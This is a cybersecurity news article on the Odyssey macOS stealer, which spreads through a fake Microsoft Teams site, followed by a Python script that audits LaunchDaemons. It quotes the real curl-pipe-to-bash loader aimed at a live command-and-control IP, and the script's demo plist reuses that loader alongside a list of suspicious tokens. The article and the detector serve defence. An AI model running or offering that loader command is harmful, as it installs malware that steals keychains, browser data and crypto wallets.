Odyssey macOS Stealer Spreads Through Spoofed Microsoft Teams Website
CloudSEK’s TRIAD discovered the
The attack leverages Microsoft’s trusted brand recognition to trick users into executing malicious commands disguised as legitimate software installation procedures.
The attack mechanism begins when victims visit the spoofed Microsoft Teams site, which displays operating system-specific instructions.
For macOS users, the site prompts them to copy a seemingly harmless command that, when pasted into Terminal, executes a base64-encoded payload: curl -s http://185.93.89.62/otherassets/plist | nohup bash &.
This command launches a heavily obfuscated AppleScript compiled file (.scpt) using osascript.
Once executed, the Odyssey stealer demonstrates sophisticated collection capabilities targeting the Apple ecosystem comprehensively. The malware harvests Apple Notes databases (NoteStore.sqlite), Safari artifacts including Cookies.binarycookies, and copies the entire login keychain.
It systematically enumerates Chromium-based browsers (Chrome, Brave, Edge, Vivaldi, Opera) and Firefox profiles, extracting cookies, saved logins, autofill data, and specifically targeting browser extension storage for cryptocurrency wallets.
The stealer targets an extensive list of desktop cryptocurrency applications, including Electrum, Coinomi, Exodus, Atomic, Wasabi, Monero, Bitcoin Core, Litecoin Core, Dash Core, Electron Cash, Guarda, Dogecoin Core, Trezor Suite, and Ledger Live.
Additionally, it collects up to 10MB of files from the Desktop and Documents folders with file extensions such as .txt, .pdf, .docx, .keys, .wallet, and .kdbx.
After collection, the malware packages all the stolen data into /tmp/out.zip and exfiltrates it to the command-and-control server at 185.93.89.62/log using HTTP POST requests with specific headers including “buildid” and “username: vipx”.
The most concerning aspect involves the malware’s persistence and app replacement capabilities. It installs a LaunchDaemon persistence mechanism using randomly named .plist files in /Library/LaunchDaemons/, requiring the user’s password obtained through fake authentication prompts.
Most alarmingly, it completely replaces the legitimate Ledger Live application with a trojanized version downloaded from the C2 server, potentially enabling ongoing cryptocurrency theft.
Organizations should implement network monitoring for unusual curl POST requests carrying zipped data and audit /Library/LaunchDaemons/ for suspicious entries; users of compromised systems should reset all credentials and remove any trojanized applications from /Applications/.
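As an added example (not code from the article or from CloudSEK), the script below audits a LaunchDaemons directory for the indicators the article describes: random, non-reverse-DNS labels and program arguments invoking curl, nohup, osascript, /tmp staging or the reported C2 address. The random-label regex is an assumed heuristic, and the two sample plists it builds are constructed for the demo, with the rogue one reusing the loader command quoted above.

```python
import plistlib
import re
import tempfile
from pathlib import Path

# Indicators taken from the article: payload fetched with curl, detached via
# nohup/bash, compiled AppleScript run through osascript, /tmp staging, C2 IP.
SUSPICIOUS_TOKENS = ("curl", "nohup", "osascript", "/tmp/", "base64", "185.93.89.62")
# Assumed heuristic: legitimate daemons use reverse-DNS labels (com.vendor.name);
# a dot-free alphanumeric label matches the "randomly named .plist" pattern.
RANDOM_LABEL = re.compile(r"^[A-Za-z0-9]{6,}$")

def audit_plist(path):
    """Return the reasons a LaunchDaemon plist looks suspicious ([] if clean)."""
    with open(path, "rb") as f:
        try:
            data = plistlib.load(f)
        except plistlib.InvalidFileException:
            return ["unparseable plist"]
    reasons = []
    label = str(data.get("Label", ""))
    if not label or RANDOM_LABEL.match(label):
        reasons.append(f"non-reverse-DNS label {label!r}")
    args = [str(data["Program"])] if "Program" in data else []
    args += [str(a) for a in data.get("ProgramArguments", [])]
    hits = [t for t in SUSPICIOUS_TOKENS if t in " ".join(args)]
    if hits:
        reasons.append("program invokes " + ", ".join(hits))
    return reasons

def audit_dir(directory="/Library/LaunchDaemons"):
    """Map each *.plist file name in the directory to its list of findings."""
    return {p.name: audit_plist(p) for p in sorted(Path(directory).glob("*.plist"))}

def build_demo_dir():
    """Constructed sample plists (not real artifacts): one benign daemon and one
    modelled on the article's curl | nohup bash loader with a random label."""
    d = Path(tempfile.mkdtemp())
    benign = {"Label": "com.example.backupagent", "RunAtLoad": True,
              "ProgramArguments": ["/usr/local/bin/backupagent", "--daemon"]}
    rogue = {"Label": "kqz8f2m1", "RunAtLoad": True, "ProgramArguments": ["/bin/bash",
             "-c", "curl -s http://185.93.89.62/otherassets/plist | nohup bash &"]}
    for name, content in (("com.example.backupagent", benign), ("kqz8f2m1", rogue)):
        with open(d / f"{name}.plist", "wb") as f:
            plistlib.dump(content, f)
    return str(d)

if __name__ == "__main__":
    for name, findings in audit_dir(build_demo_dir()).items():
        print(name, "->", findings or "clean")
```

Run it without arguments to see the constructed demo; call audit_dir() with no argument on a macOS host to scan the real /Library/LaunchDaemons.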
The post Odyssey macOS Stealer Spreads Through Spoofed Microsoft Teams Website appeared first on Cyber Security News.